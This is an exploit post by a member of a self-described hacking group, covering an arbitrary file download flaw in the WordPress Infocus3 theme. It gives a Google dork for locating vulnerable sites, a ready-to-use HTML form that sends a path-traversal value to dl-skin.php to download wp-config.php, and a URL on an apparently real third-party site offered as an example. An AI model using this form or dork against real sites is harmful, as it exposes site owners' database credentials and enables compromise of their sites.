#Title : Wordpress Infocus3 Theme Arbitrary File Download Vulnerability
#Author : Killer~X
#
Date
: 5/1/2015
################ [ Killer~X ] ################
Facebook : http:
//www.facebook.com/xXalreshyXx
Ask : http:
//ask.fm/ALRESHY
Twitter : https:
//twitter.com/killerx00x
Email : M_ox@hotmail.com
or
Cco@hotmail.com
################ [ Killer~X ] ################
################ [ Yemeni Electronic Army ] ################
Yemeni Electronic Army : http:
//yeahacker.blogspot.in/
Official Members : Monds | King alnhzh | San3a T3rr0rist | GeeSuth | Al maistro | Muteb spack gen | Killer~X | Shraoop /.
################ [ Yemeni Electronic Army ] ################
__________________________________________________________________________________
#Vendor : www.wordpress.org
#google Dork :
1- inurl:/wp-content/themes/infocus3
#Tested on : windows
################################################
#Exploit :
<html>
<body>
<form action=
"wp-content/themes/infocus3/lib/scripts/dl-skin.php"
method=
"POST"
>
<b>File</b>:<input type=
"text"
name=
"_mysite_download_skin"
value=
"../../../../../wp-config.php"
><br>
<input type=
"submit"
value=Download>
</form>
</body>
#example : http:
//www.deliriosenbits.com/wp-content/plugins/wptouch/p8.php
__________________________________________________________________________________
#Greeting to : All my friends
<3 I love u mom <3
||~ Done ~||